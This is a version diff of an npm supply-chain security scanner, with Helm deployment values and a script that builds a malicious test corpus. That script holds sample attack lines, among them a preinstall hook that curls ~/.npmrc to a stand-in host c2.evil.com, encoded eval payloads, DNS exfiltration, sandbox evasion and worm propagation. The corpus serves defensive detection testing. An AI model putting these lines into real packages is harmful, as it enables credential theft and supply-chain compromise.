@lateos/npm-scan 0.17.1 → 0.18.1

package/deploy/helm/npm-scan/values.byoc.yaml

@@ -1,75 +1,75 @@
-# BYOC Enterprise values example
-# Deploy to your VPC: helm install -f values.byoc.yaml npm-scan ./
-
-image:
-  repository: lateos/npm-scan
-  tag: "1.0.0"
-
-premium:
-  enabled: true
-  edition: enterprise
-  byoc:
-    enabled: true
-    cloudProvider: aws
-    vpcId: vpc-0123456789abcdef0
-    region: us-east-1
-    clusterName: npm-scan-enterprise
-    externalDb: true
-    externalRedis: true
-
-license:
-  key: "npm-scan-enterprise-XXXXX.YOUR-SIGNATURE-HERE"
-  secret: "your-license-secret"
-
-siem:
-  enabled: true
-  type: cef
-  endpoint: log-collector.your-company.com
-  port: 514
-  protocol: tcp
-
-pdf:
-  enabled: true
-
-sso:
-  enabled: true
-  provider: oidc
-  clientId: npm-scan-enterprise
-  issuerUrl: https://sso.your-company.com/realms/enterprise
-
-postgresql:
-  enabled: false
-  host: your-rds-endpoint.rds.amazonaws.com
-  port: 5432
-  database: npm_scan
-  username: npm_scan
-  password: ""
-
-redis:
-  enabled: false
-  host: your-redis-endpoint.cache.amazonaws.com
-  port: 6379
-
-ingress:
-  enabled: true
-  className: nginx
-  host: npm-scan.your-company.com
-  tls:
-    - secretName: npm-scan-tls
-      hosts:
-        - npm-scan.your-company.com
-
-persistence:
-  enabled: true
-  size: 50Gi
-  storageClass: gp3
-
-worker:
-  replicas: 4
-  resources:
-    requests:
-      cpu: 500m
-      memory: 1Gi
-    limits:
-      cpu: 2
+# BYOC Enterprise values example
+# Deploy to your VPC: helm install -f values.byoc.yaml npm-scan ./
+
+image:
+  repository: lateos/npm-scan
+  tag: "1.0.0"
+
+premium:
+  enabled: true
+  edition: enterprise
+  byoc:
+    enabled: true
+    cloudProvider: aws
+    vpcId: vpc-0123456789abcdef0
+    region: us-east-1
+    clusterName: npm-scan-enterprise
+    externalDb: true
+    externalRedis: true
+
+license:
+  key: "npm-scan-enterprise-XXXXX.YOUR-SIGNATURE-HERE"
+  secret: "your-license-secret"
+
+siem:
+  enabled: true
+  type: cef
+  endpoint: log-collector.your-company.com
+  port: 514
+  protocol: tcp
+
+pdf:
+  enabled: true
+
+sso:
+  enabled: true
+  provider: oidc
+  clientId: npm-scan-enterprise
+  issuerUrl: https://sso.your-company.com/realms/enterprise
+
+postgresql:
+  enabled: false
+  host: your-rds-endpoint.rds.amazonaws.com
+  port: 5432
+  database: npm_scan
+  username: npm_scan
+  password: ""
+
+redis:
+  enabled: false
+  host: your-redis-endpoint.cache.amazonaws.com
+  port: 6379
+
+ingress:
+  enabled: true
+  className: nginx
+  host: npm-scan.your-company.com
+  tls:
+    - secretName: npm-scan-tls
+      hosts:
+        - npm-scan.your-company.com
+
+persistence:
+  enabled: true
+  size: 50Gi
+  storageClass: gp3
+
+worker:
+  replicas: 4
+  resources:
+    requests:
+      cpu: 500m
+      memory: 1Gi
+    limits:
+      cpu: 2
       memory: 2Gi

package/deploy/helm/npm-scan/values.yaml

@@ -1,103 +1,103 @@
-# Helm values for npm-scan BYOC
-# Override per environment: helm install -f values-prod.yaml
-
-image:
-  repository: lateos/npm-scan
-  tag: latest
-  pullPolicy: Always
-
-replicaCount: 1
-
-license:
-  key: ""
-  secret: ""
-
-premium:
-  enabled: false
-  edition: premium
-  byoc:
-    enabled: false
-    cloudProvider: ""
-    vpcId: ""
-    region: ""
-    clusterName: ""
-    externalDb: true
-    externalRedis: true
-
-siem:
-  enabled: false
-  type: cef
-  endpoint: ""
-  port: 514
-  protocol: tcp
-  apiKey: ""
-
-pdf:
-  enabled: false
-
-sso:
-  enabled: false
-  provider: oidc
-  clientId: ""
-  clientSecret: ""
-  issuerUrl: ""
-  allowedDomains: []
-
-postgresql:
-  enabled: true
-  host: ""
-  port: 5432
-  database: npm_scan
-  username: npm_scan
-  password: ""
-  existingSecret: ""
-
-api:
-  enabled: true
-  port: 8000
-  host: 0.0.0.0
-  replicas: 1
-  corsOrigins: ["*"]
-  resources:
-    requests:
-      cpu: 100m
-      memory: 128Mi
-    limits:
-      cpu: 500m
-      memory: 512Mi
-
-worker:
-  enabled: true
-  replicas: 2
-  resources:
-    requests:
-      cpu: 200m
-      memory: 256Mi
-    limits:
-      cpu: 1
-      memory: 1Gi
-
-ingress:
-  enabled: false
-  className: ""
-  annotations: {}
-  host: npm-scan.example.com
-  tls: []
-
-service:
-  type: ClusterIP
-  port: 80
-
-persistence:
-  enabled: true
-  size: 10Gi
-  storageClass: ""
-
-nodeSelector: {}
-tolerations: []
-affinity: {}
-
-redis:
-  enabled: false
-  host: ""
+# Helm values for npm-scan BYOC
+# Override per environment: helm install -f values-prod.yaml
+
+image:
+  repository: lateos/npm-scan
+  tag: latest
+  pullPolicy: Always
+
+replicaCount: 1
+
+license:
+  key: ""
+  secret: ""
+
+premium:
+  enabled: false
+  edition: premium
+  byoc:
+    enabled: false
+    cloudProvider: ""
+    vpcId: ""
+    region: ""
+    clusterName: ""
+    externalDb: true
+    externalRedis: true
+
+siem:
+  enabled: false
+  type: cef
+  endpoint: ""
+  port: 514
+  protocol: tcp
+  apiKey: ""
+
+pdf:
+  enabled: false
+
+sso:
+  enabled: false
+  provider: oidc
+  clientId: ""
+  clientSecret: ""
+  issuerUrl: ""
+  allowedDomains: []
+
+postgresql:
+  enabled: true
+  host: ""
+  port: 5432
+  database: npm_scan
+  username: npm_scan
+  password: ""
+  existingSecret: ""
+
+api:
+  enabled: true
+  port: 8000
+  host: 0.0.0.0
+  replicas: 1
+  corsOrigins: ["*"]
+  resources:
+    requests:
+      cpu: 100m
+      memory: 128Mi
+    limits:
+      cpu: 500m
+      memory: 512Mi
+
+worker:
+  enabled: true
+  replicas: 2
+  resources:
+    requests:
+      cpu: 200m
+      memory: 256Mi
+    limits:
+      cpu: 1
+      memory: 1Gi
+
+ingress:
+  enabled: false
+  className: ""
+  annotations: {}
+  host: npm-scan.example.com
+  tls: []
+
+service:
+  type: ClusterIP
+  port: 80
+
+persistence:
+  enabled: true
+  size: 10Gi
+  storageClass: ""
+
+nodeSelector: {}
+tolerations: []
+affinity: {}
+
+redis:
+  enabled: false
+  host: ""
   port: 6379

package/package.json

@@ -1,57 +1,57 @@
-{
-  "name": "@lateos/npm-scan",
-  "version": "0.17.1",
-  "description": "Modern npm supply chain security scanner — detects obfuscated payloads, credential stealers, conditional triggers, sandbox evasion, and worm-like propagation. 11 attack types, SBOM, NIST/EU CRA compliance reporting.",
-  "main": "backend/index.js",
-  "bin": {
-    "npm-scan": "cli/cli.js"
-  },
-  "type": "module",
-  "license": "Apache-2.0",
-  "repository": {
-    "type": "git",
-    "url": "git+https://github.com/lateos-ai/npm-scan.git"
-  },
-  "readme": "README.md",
-  "keywords": [
-    "npm",
-    "security",
-    "supply-chain",
-    "scanner",
-    "malware",
-    "shai-hulud",
-    "sbom",
-    "compliance"
-  ],
-  "scripts": {
-    "dev": "node cli/cli.js",
-    "lint": "echo 'Lint stub'",
-    "test": "node --test",
-    "test:coverage": "node --experimental-test-coverage --test",
-    "test:verbose": "node --test --test-reporter spec",
-    "prepare": "husky",
-    "build": "echo 'Build stub'",
-    "corpus": "node tests/corpus/run.js"
-  },
-  "lint-staged": {
-    "**/package{,-lock}.json": "sh -c 'node cli/cli.js scan-lockfile --fail-on high'",
-    "**/yarn.lock": "sh -c 'node cli/cli.js scan-lockfile --fail-on high --yarn'",
-    "**/pnpm-lock.yaml": "sh -c 'node cli/cli.js scan-lockfile --fail-on high --pnpm'"
-  },
-  "publishConfig": {
-    "access": "public"
-  },
-  "dependencies": {
-    "acorn": "^8.16.0",
-    "commander": "^14.0.3",
-    "glob": "^13.0.6",
-    "js-yaml": "^4.1.1",
-    "pdf-lib": "^1.17.1",
-    "sql.js": "^1.11.0",
-    "tar": "^7.5.15"
-  },
-  "devDependencies": {
-    "husky": "^9.1.7",
-    "lint-staged": "^16.4.0"
-  }
-}
+{
+  "name": "@lateos/npm-scan",
+  "version": "0.18.1",
+  "description": "Modern npm supply chain security scanner — detects obfuscated payloads, credential stealers, conditional triggers, sandbox evasion, and worm-like propagation. 11 attack types, SBOM, NIST/EU CRA compliance reporting.",
+  "main": "backend/index.js",
+  "bin": {
+    "npm-scan": "cli/cli.js"
+  },
+  "type": "module",
+  "license": "Apache-2.0",
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/lateos-ai/npm-scan.git"
+  },
+  "readme": "README.md",
+  "keywords": [
+    "npm",
+    "security",
+    "supply-chain",
+    "scanner",
+    "malware",
+    "shai-hulud",
+    "sbom",
+    "compliance"
+  ],
+  "scripts": {
+    "dev": "node cli/cli.js",
+    "lint": "echo 'Lint stub'",
+    "test": "node --test",
+    "test:coverage": "node --experimental-test-coverage --test",
+    "test:verbose": "node --test --test-reporter spec",
+    "prepare": "husky",
+    "build": "echo 'Build stub'",
+    "corpus": "node tests/corpus/run.js"
+  },
+  "lint-staged": {
+    "**/package{,-lock}.json": "sh -c 'node cli/cli.js scan-lockfile --fail-on high'",
+    "**/yarn.lock": "sh -c 'node cli/cli.js scan-lockfile --fail-on high --yarn'",
+    "**/pnpm-lock.yaml": "sh -c 'node cli/cli.js scan-lockfile --fail-on high --pnpm'"
+  },
+  "publishConfig": {
+    "access": "public"
+  },
+  "dependencies": {
+    "acorn": "^8.16.0",
+    "commander": "^14.0.3",
+    "glob": "^13.0.6",
+    "js-yaml": "^4.1.1",
+    "pdf-lib": "^1.17.1",
+    "sql.js": "^1.11.0",
+    "tar": "^7.5.15"
+  },
+  "devDependencies": {
+    "husky": "^9.1.7",
+    "lint-staged": "^16.4.0"
+  }
+}

package/scripts/download-corpus.js

@@ -1,30 +1,30 @@
-import fetch from 'node-fetch';
-import { writeFileSync, existsSync } from 'fs';
-
-const TOP_PKGS = [
-  'lodash', 'chalk', 'react', 'axios', 'express',
-  'tslib', 'commander', 'typescript', 'vue', 'next',
-  'yargs', 'debug', 'moment', 'uuid', 'semver',
-  'rimraf', 'eslint', 'prettier', 'webpack', 'babel-core',
-  'underscore', 'request', 'async', 'cheerio', 'bluebird',
-  'jest', 'mocha', 'dotenv', 'glob', 'node-fetch',
-  'minimist', 'body-parser', 'cors', 'helmet', 'jsonwebtoken',
-  'socket.io', 'redis', 'mongoose', 'sequelize', 'pg',
-  'passport', 'nodemailer', 'multer', 'bcrypt', 'winston',
-  'luxon', 'dayjs', 'class-validator', 'rxjs', 'redux'
-];
-
-for (const pkg of TOP_PKGS) {
-  const file = `tests/corpus/clean/${pkg}.tgz`;
-  if (existsSync(file)) { console.log(`SKIP ${pkg}`); continue; }
-  try {
-    const res = await fetch(`https://registry.npmjs.org/${pkg}/latest`);
-    const meta = await res.json();
-    const tarRes = await fetch(meta.dist.tarball);
-    const buf = Buffer.from(await tarRes.arrayBuffer());
-    writeFileSync(file, buf);
-    console.log(`OK ${pkg} (${(buf.length/1024).toFixed(0)}KB)`);
-  } catch (e) {
-    console.log(`FAIL ${pkg}: ${e.message}`);
-  }
-}
+import fetch from 'node-fetch';
+import { writeFileSync, existsSync } from 'fs';
+
+const TOP_PKGS = [
+  'lodash', 'chalk', 'react', 'axios', 'express',
+  'tslib', 'commander', 'typescript', 'vue', 'next',
+  'yargs', 'debug', 'moment', 'uuid', 'semver',
+  'rimraf', 'eslint', 'prettier', 'webpack', 'babel-core',
+  'underscore', 'request', 'async', 'cheerio', 'bluebird',
+  'jest', 'mocha', 'dotenv', 'glob', 'node-fetch',
+  'minimist', 'body-parser', 'cors', 'helmet', 'jsonwebtoken',
+  'socket.io', 'redis', 'mongoose', 'sequelize', 'pg',
+  'passport', 'nodemailer', 'multer', 'bcrypt', 'winston',
+  'luxon', 'dayjs', 'class-validator', 'rxjs', 'redux'
+];
+
+for (const pkg of TOP_PKGS) {
+  const file = `tests/corpus/clean/${pkg}.tgz`;
+  if (existsSync(file)) { console.log(`SKIP ${pkg}`); continue; }
+  try {
+    const res = await fetch(`https://registry.npmjs.org/${pkg}/latest`);
+    const meta = await res.json();
+    const tarRes = await fetch(meta.dist.tarball);
+    const buf = Buffer.from(await tarRes.arrayBuffer());
+    writeFileSync(file, buf);
+    console.log(`OK ${pkg} (${(buf.length/1024).toFixed(0)}KB)`);
+  } catch (e) {
+    console.log(`FAIL ${pkg}: ${e.message}`);
+  }
+}

package/scripts/gen-mal-corpus.js

@@ -1,35 +1,35 @@
-import { execSync } from 'child_process';
-import { writeFileSync, mkdirSync, rmSync } from 'fs';
-import { join } from 'path';
-
-const BASE = '/tmp/npm-scan-mal';
-
-const MALS = [
-  { name: 'shai-hulud', pkg: { scripts: { preinstall: 'curl -d @~/.npmrc https://c2.evil.com/x' } }, js: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' },
-  { name: 'mal-dns-exfil', pkg: {}, js: 'dns.resolve(key + ".exfil.com", (err, addr) => {})' },
-  { name: 'mal-tamper-1', pkg: { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-mirror.git' } }, js: 'module.exports = { malicious: true }' },
-  { name: 'mal-tamper-2', pkg: { name: 'react', repository: { url: 'https://github.com/attacker/react-evil.git' } }, js: '// Source: https://evil.com/react/original.js\nmodule.exports = {}' },
-  { name: 'mal-dormant-1', pkg: {}, js: 'if (process.env.NODE_ENV === "production") { eval(atob("Y29uc29sZS5sb2coJ2V2aWwnKQ==")) }' },
-  { name: 'mal-dormant-2', pkg: {}, js: 'if (new Date() > new Date("2026-06-01")) { require("./payload.js") }' },
-  { name: 'mal-dormant-3', pkg: {}, js: 'if (process.env.CI) { process.exit(0) } else { /* malicious */ require("./exploit.js") }' },
-  { name: 'mal-evasion-1', pkg: {}, js: 'if (os.hostname().includes("docker") || os.hostname().includes("sandbox")) { process.exit(0) }' },
-  { name: 'mal-evasion-2', pkg: {}, js: 'if (process.argv.join(" ").includes("inspect")) { debugger; /* stop analysis */ }' },
-  { name: 'mal-evasion-3', pkg: {}, js: 'try { throw new Error(); } catch(e) { if (e.stack.includes("sandbox")) { process.exit(0) } }' },
-  { name: 'mal-prop-1', pkg: { name: '@evil/worm' }, js: 'execSync("npm install ./worm-pkg"); execSync("npm link")' },
-  { name: 'mal-prop-2', pkg: {}, js: 'fs.writeFileSync("../lodash/node_modules/worm/index.js", "module.exports = { compromised: true }")' },
-  { name: 'mal-prop-3', pkg: { name: 'worm-pkg' }, js: `const pj = require('../express/package.json'); pj.scripts.install = 'node worm.js'; fs.writeFileSync('../express/package.json', JSON.stringify(pj))` },
-];
-
-for (const mal of MALS) {
-  const dir = join(BASE, mal.name);
-  rmSync(dir, { recursive: true, force: true });
-  mkdirSync(dir, { recursive: true });
-  writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: mal.name, version: '1.0.0', ...mal.pkg }));
-  if (mal.js) writeFileSync(join(dir, 'index.js'), mal.js);
-  execSync(`tar czf tests/corpus/malicious/${mal.name}.tgz -C ${BASE} ${mal.name}`);
-  console.log(`OK ${mal.name}`);
-}
-
-console.log('All mal corpus entries generated.');
-console.log('Total:', MALS.length);
+import { execSync } from 'child_process';
+import { writeFileSync, mkdirSync, rmSync } from 'fs';
+import { join } from 'path';
+
+const BASE = '/tmp/npm-scan-mal';
+
+const MALS = [
+  { name: 'shai-hulud', pkg: { scripts: { preinstall: 'curl -d @~/.npmrc https://c2.evil.com/x' } }, js: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' },
+  { name: 'mal-dns-exfil', pkg: {}, js: 'dns.resolve(key + ".exfil.com", (err, addr) => {})' },
+  { name: 'mal-tamper-1', pkg: { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-mirror.git' } }, js: 'module.exports = { malicious: true }' },
+  { name: 'mal-tamper-2', pkg: { name: 'react', repository: { url: 'https://github.com/attacker/react-evil.git' } }, js: '// Source: https://evil.com/react/original.js\nmodule.exports = {}' },
+  { name: 'mal-dormant-1', pkg: {}, js: 'if (process.env.NODE_ENV === "production") { eval(atob("Y29uc29sZS5sb2coJ2V2aWwnKQ==")) }' },
+  { name: 'mal-dormant-2', pkg: {}, js: 'if (new Date() > new Date("2026-06-01")) { require("./payload.js") }' },
+  { name: 'mal-dormant-3', pkg: {}, js: 'if (process.env.CI) { process.exit(0) } else { /* malicious */ require("./exploit.js") }' },
+  { name: 'mal-evasion-1', pkg: {}, js: 'if (os.hostname().includes("docker") || os.hostname().includes("sandbox")) { process.exit(0) }' },
+  { name: 'mal-evasion-2', pkg: {}, js: 'if (process.argv.join(" ").includes("inspect")) { debugger; /* stop analysis */ }' },
+  { name: 'mal-evasion-3', pkg: {}, js: 'try { throw new Error(); } catch(e) { if (e.stack.includes("sandbox")) { process.exit(0) } }' },
+  { name: 'mal-prop-1', pkg: { name: '@evil/worm' }, js: 'execSync("npm install ./worm-pkg"); execSync("npm link")' },
+  { name: 'mal-prop-2', pkg: {}, js: 'fs.writeFileSync("../lodash/node_modules/worm/index.js", "module.exports = { compromised: true }")' },
+  { name: 'mal-prop-3', pkg: { name: 'worm-pkg' }, js: `const pj = require('../express/package.json'); pj.scripts.install = 'node worm.js'; fs.writeFileSync('../express/package.json', JSON.stringify(pj))` },
+];
+
+for (const mal of MALS) {
+  const dir = join(BASE, mal.name);
+  rmSync(dir, { recursive: true, force: true });
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: mal.name, version: '1.0.0', ...mal.pkg }));
+  if (mal.js) writeFileSync(join(dir, 'index.js'), mal.js);
+  execSync(`tar czf tests/corpus/malicious/${mal.name}.tgz -C ${BASE} ${mal.name}`);
+  console.log(`OK ${mal.name}`);
+}
+
+console.log('All mal corpus entries generated.');
+console.log('Total:', MALS.length);
 console.log('New entries: tamper-1, tamper-2, dormant-1, dormant-2, dormant-3, evasion-1, evasion-2, evasion-3');